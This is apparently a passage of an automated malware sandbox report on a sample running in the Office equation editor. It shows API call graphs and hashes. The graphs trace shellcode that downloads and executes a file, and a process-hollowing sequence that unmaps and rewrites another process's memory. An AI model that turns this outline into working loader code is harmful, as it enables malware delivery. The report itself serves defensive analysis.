                                                                                  control_flow_graph 271 3760620-3760625 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(00000000), ref: 03760625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 273 3760627-3760632 GetPEB 274 3760635-3760646 call 376064f 273->274 277 3760648-376064c 274->277
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                  • Instruction ID: 779b04ef6f7bec36401cb21abdf7a72e18cbf8843e537cd06b217c67bde3ce97
                                                                                  • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                  • Instruction Fuzzy Hash: EAD052312025028FC308DF04CA90E12F37AFFC8210B28C268E8084B619D730E892CA90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 278 37604b3-37604da ExitProcess call 37604cc 281 376052d-3760548 278->281 282 37604dd-37604e2 278->282 287 376054a-376055c 281->287 286 37604e5-37604f6 call 376050f 282->286 282->287 292 3760568-376056a 286->292 293 37604f8-37604fd 286->293 295 376056c-3760573 292->295 296 37605da-37605f3 call 37605fb 292->296 293->292 294 37604ff-3760507 293->294 297 376057b-37605d8 call 37605cd URLDownloadToFileW call 37605e6 294->297 306 3760509-376052a call 3760549 294->306 295->297 304 37605f5-3760615 ShellExecuteW call 3760620 296->304 305 376065a-3760666 296->305 297->296 320 3760617 304->320 321 3760680-3760684 304->321 309 3760669 305->309 306->281 310 3760671-3760675 309->310 311 376066b-376066f 309->311 316 3760677-376067b 310->316 317 376068a-376068c 310->317 311->310 315 376067d 311->315 315->321 316->315 316->317 326 376069c-376069d 317->326 320->309 327 3760619 320->327 323 3760686 321->323 324 3760688 321->324 323->317 324->317 328 376068e-3760697 324->328 327->317 329 376061b-3760625 ExitProcess 327->329 332 3760660-3760663 328->332 333 3760699 328->333 332->328 335 3760665 332->335 333->326 335->309
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(037604A1), ref: 037604B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 78f3f2e53b0382d33d4edc22fb1c8ff81daf70494a2cb204cf1403a14ca33cf2
                                                                                  • Instruction ID: 21418b79195cbf293b6177d698f4013874408e56dab47afbbb3f70fbfd838b26
                                                                                  • Opcode Fuzzy Hash: 78f3f2e53b0382d33d4edc22fb1c8ff81daf70494a2cb204cf1403a14ca33cf2
                                                                                  • Instruction Fuzzy Hash: 4C11DDD684E7C05FC712D7701EBA988BF20B92360075C8ADFC8C54A1A3E2559A0AD3A3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:5.8%
                                                                                  Dynamic/Decrypted Code Coverage:11.2%
                                                                                  Signature Coverage:7.3%
                                                                                  Total number of Nodes:1618
                                                                                  Total number of Limit Nodes:21
                                                                                  execution_graph 12590 1b0000 12593 1b0630 12590->12593 12592 1b0005 12594 1b064c 12593->12594 12596 1b1577 12594->12596 12599 1b05b0 12596->12599 12602 1b05dc 12599->12602 12600 1b061e 12601 1b05e2 GetFileAttributesA 12601->12602 12602->12600 12602->12601 12604 1b0420 12602->12604 12605 1b04f3 12604->12605 12606 1b04fa 12605->12606 12607 1b04ff CreateWindowExA 12605->12607 12606->12602 12607->12606 12608 1b0540 PostMessageA 12607->12608 12609 1b055f 12608->12609 12609->12606 12611 1b0110 VirtualAlloc GetModuleFileNameA 12609->12611 12612 1b017d CreateProcessA 12611->12612 12613 1b0414 12611->12613 12612->12613 12615 1b025f VirtualFree VirtualAlloc 12612->12615 12613->12609 12616 1b02a1 12615->12616 12616->12613 12617 1b02a9 ReadProcessMemory 12616->12617 12618 1b02e5 VirtualAllocEx NtWriteVirtualMemory 12617->12618 12619 1b02d5 NtUnmapViewOfSection 12617->12619 12620 1b033b 12618->12620 12619->12618 12621 1b039d WriteProcessMemory Wow64SetThreadContext ResumeThread CloseHandle 12620->12621 12622 1b0350 NtWriteVirtualMemory 12620->12622 12623 1b0407 ExitProcess 12621->12623 12622->12620 12627 2dc730 12630 2dc73f 12627->12630 12631 2dc74e 12630->12631 12634 2dcedf 12631->12634 12635 2dcefa 12634->12635 12636 2dcf03 CreateToolhelp32Snapshot 12635->12636 12637 2dcf1f Module32First 12635->12637 12636->12635 12636->12637 12638 2dcf2e 12637->12638 12639 2dc73e 12637->12639 12641 2dcb9e 12638->12641 12642 2dcbc9 12641->12642 12643 2dcbda VirtualAlloc 12642->12643 12644 2dcc12 12642->12644 12643->12644 12644->12644 12624 408ded 12625 408d7b __encode_pointer 7 API calls 12624->12625 12626 408df4 12625->12626 10670 406b89 10709 40a19c 10670->10709 10672 406b95 GetStartupInfoA 10673 406bb8 10672->10673 10710 40d3b1 HeapCreate 10673->10710 10676 406c08 10712 40918b GetModuleHandleW 10676->10712 10680 406c19 __RTC_Initialize 10746 40d111 10680->10746 10681 406b60 _fast_error_exit 68 API calls 10681->10680 10683 406c27 10684 406c33 GetCommandLineA 10683->10684 10869 40a3bc 10683->10869 10761 40cfda 10684->10761 10691 406c58 10800 40cca7 10691->10800 10692 40a3bc __amsg_exit 68 API calls 10692->10691 10695 406c69 10815 40a47b 10695->10815 10696 40a3bc __amsg_exit 68 API calls 10696->10695 10698 406c70 10699 406c7b 10698->10699 10701 40a3bc __amsg_exit 68 API calls 10698->10701 10821 40cc48 10699->10821 10701->10699 10705 406caa 10879 40a658 10705->10879 10708 406caf __lseeki64 10709->10672 10711 406bfc 10710->10711 10711->10676 10861 406b60 10711->10861 10713 4091a6 10712->10713 10714 40919f 10712->10714 10716 4091b0 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 10713->10716 10717 40930e 10713->10717 10882 40a38c 10714->10882 10720 4091f9 TlsAlloc 10716->10720 10943 408ea5 10717->10943 10722 406c0e 10720->10722 10723 409247 TlsSetValue 10720->10723 10722->10680 10722->10681 10723->10722 10724 409258 10723->10724 10886 40a676 10724->10886 10729 408d7b __encode_pointer 7 API calls 10730 409278 10729->10730 10731 408d7b __encode_pointer 7 API calls 10730->10731 10732 409288 10731->10732 10733 408d7b __encode_pointer 7 API calls 10732->10733 10734 409298 10733->10734 10905 40d57d 10734->10905 10741 408df6 __decode_pointer 6 API calls 10742 4092ec 10741->10742 10742->10717 10743 4092f3 10742->10743 10925 408ee2 10743->10925 10745 4092fb GetCurrentThreadId 10745->10722 11274 40a19c 10746->11274 10748 40d11d GetStartupInfoA 10749 410b9f __calloc_crt 68 API calls 10748->10749 10756 40d13e 10749->10756 10750 40d35c __lseeki64 10750->10683 10751 40d2d9 GetStdHandle 10755 40d2a3 10751->10755 10752 410b9f __calloc_crt 68 API calls 10752->10756 10753 40d33e SetHandleCount 10753->10750 10754 40d2eb GetFileType 10754->10755 10755->10750 10755->10751 10755->10753 10755->10754 10757 410ffa __ioinit InitializeCriticalSectionAndSpinCount 10755->10757 10756->10750 10756->10752 10756->10755 10758 40d226 10756->10758 10757->10755 10758->10750 10758->10755 10759 40d24f GetFileType 10758->10759 10760 410ffa __ioinit InitializeCriticalSectionAndSpinCount 10758->10760 10759->10758 10760->10758 10762 40cff8 GetEnvironmentStringsW 10761->10762 10765 40d017 10761->10765 10763 40d000 10762->10763 10764 40d00c GetLastError 10762->10764 10768 40d042 WideCharToMultiByte 10763->10768 10769 40d033 GetEnvironmentStringsW 10763->10769 10764->10765 10765->10763 10766 40d0b0 10765->10766 10767 40d0b9 GetEnvironmentStrings 10766->10767 10771 406c43 10766->10771 10770 40d0c9 10767->10770 10767->10771 10774 40d0a5 FreeEnvironmentStringsW 10768->10774 10775 40d076 10768->10775 10769->10768 10769->10771 10776 410b5a __malloc_crt 68 API calls 10770->10776 10787 40cf1f 10771->10787 10774->10771 10777 410b5a __malloc_crt 68 API calls 10775->10777 10778 40d0e3 10776->10778 10779 40d07c 10777->10779 10780 40d0f6 _memcpy_s 10778->10780 10781 40d0ea FreeEnvironmentStringsA 10778->10781 10779->10774 10782 40d084 WideCharToMultiByte 10779->10782 10785 40d100 FreeEnvironmentStringsA 10780->10785 10781->10771 10783 40d09e 10782->10783 10784 40d096 10782->10784 10783->10774 10786 406fa4 __crtLCMapStringA_stat 68 API calls 10784->10786 10785->10771 10786->10783 10788 40cf34 10787->10788 10789 40cf39 GetModuleFileNameA 10787->10789 11281 40ec92 10788->11281 10791 40cf60 10789->10791 11275 40cd85 10791->11275 10794 406c4d 10794->10691 10794->10692 10795 40cf9c 10796 410b5a __malloc_crt 68 API calls 10795->10796 10797 40cfa2 10796->10797 10797->10794 10798 40cd85 _parse_cmdline 78 API calls 10797->10798 10799 40cfbc 10798->10799 10799->10794 10801 40ccb0 10800->10801 10804 40ccb5 _strlen 10800->10804 10802 40ec92 ___initmbctable 112 API calls 10801->10802 10802->10804 10803 406c5e 10803->10695 10803->10696 10804->10803 10805 410b9f __calloc_crt 68 API calls 10804->10805 10806 40ccea _strlen 10805->10806 10806->10803 10807 40cd48 10806->10807 10809 410b9f __calloc_crt 68 API calls 10806->10809 10810 40cd6e 10806->10810 10812 406e23 _strcpy_s 68 API calls 10806->10812 10813 40cd2f 10806->10813 10808 406fa4 __crtLCMapStringA_stat 68 API calls 10807->10808 10808->10803 10809->10806 10811 406fa4 __crtLCMapStringA_stat 68 API calls 10810->10811 10811->10803 10812->10806 10813->10806 10814 40620a __invoke_watson 10 API calls 10813->10814 10814->10813 10816 40a489 __IsNonwritableInCurrentImage 10815->10816 11692 408477 10816->11692 10818 40a4a7 __initterm_e 10820 40a4c6 __IsNonwritableInCurrentImage __initterm 10818->10820 11696 40943f 10818->11696 10820->10698 10822 40cc56 10821->10822 10823 40cc5b 10821->10823 10824 40ec92 ___initmbctable 112 API calls 10822->10824 10825 406c81 10823->10825 10826 4128b2 _parse_cmdline 78 API calls 10823->10826 10824->10823 10827 4047de 10825->10827 10826->10823 10828 4047f5 10827->10828 10829 40486b 10827->10829 11823 406b38 10828->11823 10831 404890 19 API calls 10829->10831 10835 40493a 10829->10835 10831->10835 10833 404944 GetComboBoxInfo GetMessageExtraInfo GetTickCount GetBoundsRect 10833->10835 10835->10833 10837 404980 10835->10837 11796 40455f 10837->11796 10840 40480c 10842 4069e7 70 API calls 10840->10842 10841 404985 10841->10705 10876 40a62c 10841->10876 10843 404812 10842->10843 11835 40572d 10843->11835 10849 404836 11853 404f83 10849->11853 10852 4053ae std::_String_base::_Xlen 76 API calls 10853 40484b 10852->10853 11856 405cb5 10853->11856 10856 404f83 Mailbox 68 API calls 10857 404861 10856->10857 11872 4068d0 10857->11872 10862 406b73 10861->10862 10863 406b6e 10861->10863 10865 40a8d6 __NMSG_WRITE 68 API calls 10862->10865 10864 40aa81 __FF_MSGBANNER 68 API calls 10863->10864 10864->10862 10866 406b7b 10865->10866 10867 40a410 _malloc 3 API calls 10866->10867 10868 406b85 10867->10868 10868->10676 10870 40aa81 __FF_MSGBANNER 68 API calls 10869->10870 10871 40a3c6 10870->10871 10872 40a8d6 __NMSG_WRITE 68 API calls 10871->10872 10873 40a3ce 10872->10873 10874 408df6 __decode_pointer 6 API calls 10873->10874 10875 406c32 10874->10875 10875->10684 10877 40a500 _doexit 68 API calls 10876->10877 10878 40a63d 10877->10878 10878->10705 10880 40a500 _doexit 68 API calls 10879->10880 10881 40a663 10880->10881 10881->10708 10883 40a397 Sleep GetModuleHandleW 10882->10883 10884 40a3b5 10883->10884 10885 4091a5 10883->10885 10884->10883 10884->10885 10885->10713 10954 408ded 10886->10954 10888 40a67e __init_pointers __initp_misc_winsig 10957 4068bf 10888->10957 10891 408d7b __encode_pointer 7 API calls 10892 40925d 10891->10892 10893 408d7b TlsGetValue 10892->10893 10894 408d93 10893->10894 10895 408db4 GetModuleHandleW 10893->10895 10894->10895 10896 408d9d TlsGetValue 10894->10896 10897 408dc4 10895->10897 10898 408dcf GetProcAddress 10895->10898 10904 408da8 10896->10904 10899 40a38c __crt_waiting_on_module_handle 2 API calls 10897->10899 10900 408dac 10898->10900 10901 408dca 10899->10901 10902 408de7 10900->10902 10903 408ddf RtlEncodePointer 10900->10903 10901->10898 10901->10902 10902->10729 10903->10902 10904->10895 10904->10900 10906 40d588 10905->10906 10908 4092a5 10906->10908 10960 410ffa 10906->10960 10908->10717 10909 408df6 TlsGetValue 10908->10909 10910 408e0e 10909->10910 10911 408e2f GetModuleHandleW 10909->10911 10910->10911 10912 408e18 TlsGetValue 10910->10912 10913 408e4a GetProcAddress 10911->10913 10914 408e3f 10911->10914 10917 408e23 10912->10917 10918 408e27 10913->10918 10915 40a38c __crt_waiting_on_module_handle 2 API calls 10914->10915 10916 408e45 10915->10916 10916->10913 10916->10918 10917->10911 10917->10918 10918->10717 10919 410b9f 10918->10919 10921 410ba8 10919->10921 10922 4092d2 10921->10922 10923 410bc6 Sleep 10921->10923 10965 41598b 10921->10965 10922->10717 10922->10741 10924 410bdb 10923->10924 10924->10921 10924->10922 11253 40a19c 10925->11253 10927 408eee GetModuleHandleW 10928 408efe 10927->10928 10932 408f04 10927->10932 10929 40a38c __crt_waiting_on_module_handle 2 API calls 10928->10929 10929->10932 10930 408f40 10933 40d6f9 __lock 64 API calls 10930->10933 10931 408f1c GetProcAddress GetProcAddress 10931->10930 10932->10930 10932->10931 10934 408f5f InterlockedIncrement 10933->10934 11254 408fb7 10934->11254 10937 40d6f9 __lock 64 API calls 10938 408f80 10937->10938 11257 40edf9 InterlockedIncrement 10938->11257 10940 408f9e 11269 408fc0 10940->11269 10942 408fab __lseeki64 10942->10745 10944 408eaf 10943->10944 10947 408ebb 10943->10947 10945 408df6 __decode_pointer 6 API calls 10944->10945 10945->10947 10946 408ecf TlsFree 10948 408edd 10946->10948 10947->10946 10947->10948 10949 40d5e4 DeleteCriticalSection 10948->10949 10950 40d5fc 10948->10950 10951 406fa4 __crtLCMapStringA_stat 68 API calls 10949->10951 10952 40d60e DeleteCriticalSection 10950->10952 10953 40d61c 10950->10953 10951->10948 10952->10950 10953->10722 10955 408d7b __encode_pointer 7 API calls 10954->10955 10956 408df4 10955->10956 10956->10888 10958 408d7b __encode_pointer 7 API calls 10957->10958 10959 4068c9 10958->10959 10959->10891 10964 40a19c 10960->10964 10962 411006 InitializeCriticalSectionAndSpinCount 10963 41104a __lseeki64 10962->10963 10963->10906 10964->10962 10966 415997 __lseeki64 10965->10966 10967 4159af 10966->10967 10977 4159ce _memset 10966->10977 10978 407567 10967->10978 10971 415a40 RtlAllocateHeap 10971->10977 10972 4159c4 __lseeki64 10972->10921 10977->10971 10977->10972 10984 40d6f9 10977->10984 10991 40df0b 10977->10991 10997 415a87 10977->10997 11000 409465 10977->11000 11003 408fc9 GetLastError 10978->11003 10980 40756c 10981 406332 10980->10981 10982 408df6 __decode_pointer 6 API calls 10981->10982 10983 406342 __invoke_watson 10982->10983 10985 40d721 EnterCriticalSection 10984->10985 10986 40d70e 10984->10986 10985->10977 11050 40d636 10986->11050 10988 40d714 10988->10985 10989 40a3bc __amsg_exit 67 API calls 10988->10989 10990 40d720 10989->10990 10990->10985 10993 40df39 10991->10993 10992 40dfdb 10992->10977 10993->10992 10996 40dfd2 10993->10996 11241 40da72 10993->11241 10996->10992 11248 40db22 10996->11248 11252 40d61f LeaveCriticalSection 10997->11252 10999 415a8e 10999->10977 11001 408df6 __decode_pointer 6 API calls 11000->11001 11002 409475 11001->11002 11002->10977 11017 408e71 TlsGetValue 11003->11017 11006 409036 SetLastError 11006->10980 11007 410b9f __calloc_crt 65 API calls 11008 408ff4 11007->11008 11008->11006 11009 408df6 __decode_pointer 6 API calls 11008->11009 11010 40900e 11009->11010 11011 409015 11010->11011 11012 40902d 11010->11012 11014 408ee2 __getptd_noexit 65 API calls 11011->11014 11022 406fa4 11012->11022 11016 40901d GetCurrentThreadId 11014->11016 11015 409033 11015->11006 11016->11006 11018 408ea1 11017->11018 11019 408e86 11017->11019 11018->11006 11018->11007 11020 408df6 __decode_pointer 6 API calls 11019->11020 11021 408e91 TlsSetValue 11020->11021 11021->11018 11024 406fb0 __lseeki64 11022->11024 11023 407029 __dosmaperr __lseeki64 11023->11015 11024->11023 11026 40d6f9 __lock 66 API calls 11024->11026 11034 406fef 11024->11034 11025 407004 HeapFree 11025->11023 11027 407016 11025->11027 11031 406fc7 ___sbh_find_block 11026->11031 11028 407567 _strcpy_s 66 API calls 11027->11028 11029 40701b GetLastError 11028->11029 11029->11023 11030 406fe1 11042 406ffa 11030->11042 11031->11030 11035 40d75c 11031->11035 11034->11023 11034->11025 11036 40da3d 11035->11036 11037 40d79b 11035->11037 11036->11030 11037->11036 11038 40d987 VirtualFree 11037->11038 11039 40d9eb 11038->11039 11039->11036 11040 40d9fa VirtualFree HeapFree 11039->11040 11045 4075b0 11040->11045 11049 40d61f LeaveCriticalSection 11042->11049 11044 407001 11044->11034 11046 4075c8 11045->11046 11047 4075ef __VEC_memcpy 11046->11047 11048 4075f7 11046->11048 11047->11048 11048->11036 11049->11044 11051 40d642 __lseeki64 11050->11051 11065 40d668 11051->11065 11076 40aa81 11051->11076 11057 40d678 __lseeki64 11057->10988 11059 40d699 11062 40d6f9 __lock 68 API calls 11059->11062 11060 40d68a 11061 407567 _strcpy_s 68 API calls 11060->11061 11061->11057 11064 40d6a0 11062->11064 11066 40d6d4 11064->11066 11067 40d6a8 11064->11067 11065->11057 11122 410b5a 11065->11122 11069 406fa4 __crtLCMapStringA_stat 68 API calls 11066->11069 11068 410ffa __ioinit InitializeCriticalSectionAndSpinCount 11067->11068 11071 40d6b3 11068->11071 11070 40d6c5 11069->11070 11127 40d6f0 11070->11127 11071->11070 11073 406fa4 __crtLCMapStringA_stat 68 API calls 11071->11073 11074 40d6bf 11073->11074 11075 407567 _strcpy_s 68 API calls 11074->11075 11075->11070 11130 4112ec 11076->11130 11079 40aa95 11081 40a8d6 __NMSG_WRITE 68 API calls 11079->11081 11083 40aab7 11079->11083 11080 4112ec __set_error_mode 68 API calls 11080->11079 11082 40aaad 11081->11082 11084 40a8d6 __NMSG_WRITE 68 API calls 11082->11084 11085 40a8d6 11083->11085 11084->11083 11086 40a8ea 11085->11086 11087 40aa45 11086->11087 11088 4112ec __set_error_mode 65 API calls 11086->11088 11119 40a410 11087->11119 11089 40a90c 11088->11089 11090 40aa4a GetStdHandle 11089->11090 11092 4112ec __set_error_mode 65 API calls 11089->11092 11090->11087 11091 40aa58 _strlen 11090->11091 11091->11087 11095 40aa71 WriteFile 11091->11095 11093 40a91d 11092->11093 11093->11090 11094 40a92f 11093->11094 11094->11087 11136 406e23 11094->11136 11095->11087 11098 40a965 GetModuleFileNameA 11099 40a983 11098->11099 11104 40a9a6 _strlen 11098->11104 11102 406e23 _strcpy_s 65 API calls 11099->11102 11103 40a993 11102->11103 11103->11104 11106 40620a __invoke_watson 10 API calls 11103->11106 11105 40a9e9 11104->11105 11152 411237 11104->11152 11161 4111c3 11105->11161 11106->11104 11110 40aa0d 11113 4111c3 _strcat_s 65 API calls 11110->11113 11112 40620a __invoke_watson 10 API calls 11112->11110 11115 40aa21 11113->11115 11114 40620a __invoke_watson 10 API calls 11114->11105 11116 40aa32 11115->11116 11118 40620a __invoke_watson 10 API calls 11115->11118 11170 41105a 11116->11170 11118->11116 11208 40a3e5 GetModuleHandleW 11119->11208 11124 410b63 11122->11124 11125 40d683 11124->11125 11126 410b7a Sleep 11124->11126 11211 406eda 11124->11211 11125->11059 11125->11060 11126->11124 11240 40d61f LeaveCriticalSection 11127->11240 11129 40d6f7 11129->11057 11131 4112fb 11130->11131 11132 407567 _strcpy_s 68 API calls 11131->11132 11135 40aa88 11131->11135 11133 41131e 11132->11133 11134 406332 _strcpy_s 6 API calls 11133->11134 11134->11135 11135->11079 11135->11080 11137 406e34 11136->11137 11138 406e3b 11136->11138 11137->11138 11143 406e61 11137->11143 11139 407567 _strcpy_s 68 API calls 11138->11139 11140 406e40 11139->11140 11141 406332 _strcpy_s 6 API calls 11140->11141 11142 406e4f 11141->11142 11142->11098 11145 40620a 11142->11145 11143->11142 11144 407567 _strcpy_s 68 API calls 11143->11144 11144->11140 11197 407140 11145->11197 11147 406237 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11148 406313 GetCurrentProcess TerminateProcess 11147->11148 11149 406307 __invoke_watson 11147->11149 11199 406dab 11148->11199 11149->11148 11151 406330 11151->11098 11156 411249 11152->11156 11153 41124d 11154 40a9d6 11153->11154 11155 407567 _strcpy_s 68 API calls 11153->11155 11154->11105 11154->11114 11157 411269 11155->11157 11156->11153 11156->11154 11159 411293 11156->11159 11158 406332 _strcpy_s 6 API calls 11157->11158 11158->11154 11159->11154 11160 407567 _strcpy_s 68 API calls 11159->11160 11160->11157 11162 4111db 11161->11162 11164 4111d4 11161->11164 11163 407567 _strcpy_s 68 API calls 11162->11163 11169 4111e0 11163->11169 11164->11162 11167 41120f 11164->11167 11165 406332 _strcpy_s 6 API calls 11166 40a9fc 11165->11166 11166->11110 11166->11112 11167->11166 11168 407567 _strcpy_s 68 API calls 11167->11168 11168->11169 11169->11165 11171 408ded __init_pointers 7 API calls 11170->11171 11172 41106a 11171->11172 11173 41107d LoadLibraryA 11172->11173 11177 411105 11172->11177 11175 411092 GetProcAddress 11173->11175 11176 4111a7 11173->11176 11174 41112f 11180 408df6 __decode_pointer 6 API calls 11174->11180 11195 41115a 11174->11195 11175->11176 11178 4110a8 11175->11178 11176->11087 11177->11174 11181 408df6 __decode_pointer 6 API calls 11177->11181 11182 408d7b __encode_pointer 7 API calls 11178->11182 11179 408df6 __decode_pointer 6 API calls 11179->11176 11190 411172 11180->11190 11183 411122 11181->11183 11184 4110ae GetProcAddress 11182->11184 11185 408df6 __decode_pointer 6 API calls 11183->11185 11186 408d7b __encode_pointer 7 API calls 11184->11186 11185->11174 11187 4110c3 GetProcAddress 11186->11187 11188 408d7b __encode_pointer 7 API calls 11187->11188 11189 4110d8 GetProcAddress 11188->11189 11191 408d7b __encode_pointer 7 API calls 11189->11191 11193 408df6 __decode_pointer 6 API calls 11190->11193 11190->11195 11192 4110ed 11191->11192 11192->11177 11194 4110f7 GetProcAddress 11192->11194 11193->11195 11196 408d7b __encode_pointer 7 API calls 11194->11196 11195->11179 11196->11177 11198 40714c __VEC_memzero 11197->11198 11198->11147 11200 406db3 11199->11200 11201 406db5 IsDebuggerPresent 11199->11201 11200->11151 11207 408d73 11201->11207 11204 40d544 SetUnhandledExceptionFilter UnhandledExceptionFilter 11205 40d561 __invoke_watson 11204->11205 11206 40d569 GetCurrentProcess TerminateProcess 11204->11206 11205->11206 11206->11151 11207->11204 11209 40a3f9 GetProcAddress 11208->11209 11210 40a409 ExitProcess 11208->11210 11209->11210 11212 406f8d 11211->11212 11217 406eec 11211->11217 11213 409465 __calloc_impl 6 API calls 11212->11213 11214 406f93 11213->11214 11216 407567 _strcpy_s 67 API calls 11214->11216 11215 40aa81 __FF_MSGBANNER 67 API calls 11215->11217 11222 406f85 11216->11222 11217->11215 11218 40a8d6 __NMSG_WRITE 67 API calls 11217->11218 11220 406f49 HeapAlloc 11217->11220 11221 40a410 _malloc 3 API calls 11217->11221 11217->11222 11223 406f79 11217->11223 11224 409465 __calloc_impl 6 API calls 11217->11224 11226 406f7e 11217->11226 11228 406e8b 11217->11228 11218->11217 11220->11217 11221->11217 11222->11124 11225 407567 _strcpy_s 67 API calls 11223->11225 11224->11217 11225->11226 11227 407567 _strcpy_s 67 API calls 11226->11227 11227->11222 11229 406e97 __lseeki64 11228->11229 11230 40d6f9 __lock 68 API calls 11229->11230 11231 406ec8 __lseeki64 11229->11231 11232 406ead 11230->11232 11231->11217 11233 40df0b ___sbh_alloc_block 5 API calls 11232->11233 11234 406eb8 11233->11234 11236 406ed1 11234->11236 11239 40d61f LeaveCriticalSection 11236->11239 11238 406ed8 11238->11231 11239->11238 11240->11129 11242 40da85 HeapReAlloc 11241->11242 11243 40dab9 HeapAlloc 11241->11243 11244 40daa7 11242->11244 11247 40daa3 11242->11247 11245 40dadc VirtualAlloc 11243->11245 11243->11247 11244->11243 11246 40daf6 HeapFree 11245->11246 11245->11247 11246->11247 11247->10996 11249 40db39 VirtualAlloc 11248->11249 11251 40db80 11249->11251 11251->10992 11252->10999 11253->10927 11272 40d61f LeaveCriticalSection 11254->11272 11256 408f79 11256->10937 11258 40ee17 InterlockedIncrement 11257->11258 11259 40ee1a 11257->11259 11258->11259 11260 40ee24 InterlockedIncrement 11259->11260 11261 40ee27 11259->11261 11260->11261 11262 40ee31 InterlockedIncrement 11261->11262 11263 40ee34 11261->11263 11262->11263 11264 40ee3e InterlockedIncrement 11263->11264 11266 40ee41 11263->11266 11264->11266 11265 40ee5a InterlockedIncrement 11265->11266 11266->11265 11267 40ee6a InterlockedIncrement 11266->11267 11268 40ee75 InterlockedIncrement 11266->11268 11267->11266 11268->10940 11273 40d61f LeaveCriticalSection 11269->11273 11271 408fc7 11271->10942 11272->11256 11273->11271 11274->10748 11277 40cda4 11275->11277 11278 40ce11 11277->11278 11285 4128b2 11277->11285 11279 40cf0f 11278->11279 11280 4128b2 78 API calls _parse_cmdline 11278->11280 11279->10794 11279->10795 11280->11278 11282 40ec9b 11281->11282 11283 40eca2 11281->11283 11507 40eaf8 11282->11507 11283->10789 11288 41285f 11285->11288 11291 407915 11288->11291 11292 407928 11291->11292 11298 407975 11291->11298 11299 409042 11292->11299 11295 407955 11295->11298 11319 40e7f3 11295->11319 11298->11277 11300 408fc9 __getptd_noexit 68 API calls 11299->11300 11301 40904a 11300->11301 11302 40792d 11301->11302 11303 40a3bc __amsg_exit 68 API calls 11301->11303 11302->11295 11304 40ef5f 11302->11304 11303->11302 11305 40ef6b __lseeki64 11304->11305 11306 409042 __getptd 68 API calls 11305->11306 11307 40ef70 11306->11307 11308 40ef9e 11307->11308 11310 40ef82 11307->11310 11309 40d6f9 __lock 68 API calls 11308->11309 11311 40efa5 11309->11311 11312 409042 __getptd 68 API calls 11310->11312 11335 40ef21 11311->11335 11314 40ef87 11312->11314 11317 40ef95 __lseeki64 11314->11317 11318 40a3bc __amsg_exit 68 API calls 11314->11318 11317->11295 11318->11317 11320 40e7ff __lseeki64 11319->11320 11321 409042 __getptd 68 API calls 11320->11321 11322 40e804 11321->11322 11323 40d6f9 __lock 68 API calls 11322->11323 11330 40e816 11322->11330 11324 40e834 11323->11324 11325 40e87d 11324->11325 11328 40e865 InterlockedIncrement 11324->11328 11329 40e84b InterlockedDecrement 11324->11329 11503 40e88e 11325->11503 11326 40a3bc __amsg_exit 68 API calls 11331 40e824 __lseeki64 11326->11331 11328->11325 11329->11328 11332 40e856 11329->11332 11330->11326 11330->11331 11331->11298 11332->11328 11333 406fa4 __crtLCMapStringA_stat 68 API calls 11332->11333 11334 40e864 11333->11334 11334->11328 11336 40ef25 11335->11336 11337 40ef57 11335->11337 11336->11337 11338 40edf9 ___addlocaleref 8 API calls 11336->11338 11343 40efc9 11337->11343 11339 40ef38 11338->11339 11339->11337 11346 40ee88 11339->11346 11502 40d61f LeaveCriticalSection 11343->11502 11345 40efd0 11345->11314 11347 40ee99 InterlockedDecrement 11346->11347 11348 40ef1c 11346->11348 11349 40eeb1 11347->11349 11350 40eeae InterlockedDecrement 11347->11350 11348->11337 11360 40ecb0 11348->11360 11351 40eebb InterlockedDecrement 11349->11351 11352 40eebe 11349->11352 11350->11349 11351->11352 11353 40eec8 InterlockedDecrement 11352->11353 11354 40eecb 11352->11354 11353->11354 11355 40eed5 InterlockedDecrement 11354->11355 11357 40eed8 11354->11357 11355->11357 11356 40eef1 InterlockedDecrement 11356->11357 11357->11356 11358 40ef01 InterlockedDecrement 11357->11358 11359 40ef0c InterlockedDecrement 11357->11359 11358->11357 11359->11348 11361 40ed34 11360->11361 11364 40ecc7 11360->11364 11362 406fa4 __crtLCMapStringA_stat 68 API calls 11361->11362 11363 40ed81 11361->11363 11365 40ed55 11362->11365 11384 40eda8 11363->11384 11414 412ee6 11363->11414 11364->11361 